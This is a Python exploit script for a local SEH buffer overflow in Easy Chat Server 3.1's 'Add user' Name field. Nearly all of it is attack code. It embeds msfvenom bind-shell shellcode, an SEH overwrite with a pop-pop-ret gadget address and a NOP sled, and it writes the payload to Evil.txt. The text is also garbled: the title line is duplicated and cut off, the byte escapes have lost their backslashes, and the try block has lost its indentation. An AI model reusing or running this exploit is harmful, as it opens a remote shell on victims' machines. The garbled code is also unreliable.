#!/usr/bin/env python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : Easy Chat Server 3.1 - 'Add user #!/usr/bin/env python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : Easy Chat Server 3.1 - 'Add user' Local Buffer Overflow #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : http://www.echatserver.com/index.htm #
# Vulnerable Software: http://www.echatserver.com/ecssetup.exe #
# Tested on : Windows 7 Enterprise SP1 (x64) #
# Steps to reproduce : paste contents of Evil.txt in 'Name:' field under Add user and click OK #
#----------------------------------------------------------------------------------------------------------#

# msfvenom -p windows/shell_bind_tcp -b 'x00x0ax0d' -e x86/alpha_mixed -f python -v shellcode
# Payload size: 718 bytes
shellcode = ""
shellcode += "x89xe3xdaxd3xd9x73xf4x5ex56x59x49x49"
shellcode += "x49x49x49x49x49x49x49x49x43x43x43x43"
shellcode += "x43x43x37x51x5ax6ax41x58x50x30x41x30"
shellcode += "x41x6bx41x41x51x32x41x42x32x42x42x30"
shellcode += "x42x42x41x42x58x50x38x41x42x75x4ax49"
shellcode += "x79x6cx6ax48x6bx32x53x30x73x30x77x70"
shellcode += "x43x50x4ex69x7ax45x36x51x79x50x61x74"
shellcode += "x4ex6bx52x70x76x50x6ex6bx62x72x44x4c"
shellcode += "x4cx4bx51x42x72x34x4cx4bx71x62x66x48"
shellcode += "x76x6fx4dx67x63x7ax45x76x50x31x4bx4f"
shellcode += "x6cx6cx65x6cx75x31x63x4cx77x72x44x6c"
shellcode += "x35x70x4ax61x68x4fx74x4dx63x31x5ax67"
shellcode += "x69x72x5ax52x76x32x46x37x6ex6bx52x72"
shellcode += "x44x50x6ex6bx30x4ax75x6cx6ex6bx62x6c"
shellcode += "x66x71x73x48x68x63x77x38x67x71x58x51"
shellcode += "x66x31x6cx4bx31x49x31x30x46x61x59x43"
shellcode += "x6cx4bx37x39x56x78x7ax43x45x6ax50x49"
shellcode += "x4cx4bx74x74x6ex6bx53x31x6ax76x66x51"
shellcode += "x69x6fx6ex4cx59x51x4ax6fx44x4dx76x61"
shellcode += "x6ax67x64x78x6bx50x70x75x4ax56x44x43"
shellcode += "x63x4dx48x78x77x4bx51x6dx67x54x52x55"
shellcode += "x59x74x70x58x4ex6bx66x38x65x74x55x51"
shellcode += "x68x53x63x56x6ex6bx56x6cx70x4bx4ex6b"
shellcode += "x52x78x45x4cx35x51x38x53x6cx4bx56x64"
shellcode += "x6cx4bx67x71x4ax70x6fx79x73x74x71x34"
shellcode += "x45x74x73x6bx43x6bx31x71x73x69x51x4a"
shellcode += "x70x51x59x6fx4dx30x51x4fx73x6fx33x6a"
shellcode += "x4ex6bx36x72x58x6bx6cx4dx33x6dx31x78"
shellcode += "x70x33x57x42x47x70x43x30x35x38x30x77"
shellcode += "x33x43x46x52x53x6fx36x34x61x78x42x6c"
shellcode += "x63x47x54x66x36x67x59x6fx58x55x6dx68"
shellcode += "x4ex70x53x31x55x50x77x70x35x79x7ax64"
shellcode += "x50x54x30x50x65x38x55x79x6bx30x62x4b"
shellcode += "x53x30x39x6fx5ax75x43x5ax33x38x66x39"
shellcode += "x52x70x79x72x59x6dx51x50x76x30x51x50"
shellcode += "x66x30x35x38x79x7ax66x6fx69x4fx59x70"
shellcode += "x39x6fx79x45x6fx67x35x38x66x62x63x30"
shellcode += "x54x51x71x4cx4dx59x49x76x52x4ax56x70"
shellcode += "x66x36x76x37x33x58x78x42x6bx6bx56x57"
shellcode += "x55x37x69x6fx79x45x31x47x33x58x68x37"
shellcode += "x79x79x34x78x4bx4fx4bx4fx49x45x46x37"
shellcode += "x35x38x61x64x38x6cx57x4bx69x71x69x6f"
shellcode += "x4bx65x42x77x4fx67x33x58x44x35x32x4e"
shellcode += "x32x6dx55x31x59x6fx78x55x65x38x30x63"
shellcode += "x52x4dx42x44x57x70x4bx39x79x73x63x67"
shellcode += "x33x67x30x57x36x51x59x66x73x5ax46x72"
shellcode += "x43x69x50x56x49x72x79x6dx51x76x58x47"
shellcode += "x33x74x67x54x47x4cx76x61x66x61x4cx4d"
shellcode += "x57x34x54x64x62x30x78x46x77x70x33x74"
shellcode += "x70x54x42x70x70x56x73x66x30x56x42x66"
shellcode += "x32x76x50x4ex61x46x63x66x52x73x42x76"
shellcode += "x61x78x63x49x78x4cx75x6fx4ex66x6bx4f"
shellcode += "x4ex35x4fx79x69x70x52x6ex70x56x43x76"
shellcode += "x69x6fx64x70x35x38x75x58x6bx37x45x4d"
shellcode += "x33x50x69x6fx5ax75x6fx4bx7ax50x58x35"
shellcode += "x6dx72x33x66x71x78x6dx76x6fx65x4fx4d"
shellcode += "x6dx4dx69x6fx4bx65x35x6cx35x56x73x4c"
shellcode += "x64x4ax6dx50x6bx4bx69x70x70x75x67x75"
shellcode += "x6dx6bx77x37x36x73x42x52x32x4fx51x7a"
shellcode += "x77x70x32x73x39x6fx6bx65x41x41"

buffer = 'xcc' * 217 # offset to nSEH
buffer += 'x75x06x74x06' # nSEH | jump net
buffer += 'x21x7fx01x10' # SEH | 0x10017f21 : pop esi # pop ecx # ret | [SSLEAY32.dll]
buffer += 'x90' * 10 # nop sled
buffer += shellcode # bind shell
buffer += 'xcc' * (5000-217-4-4-10-len(shellcode)) # junk

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e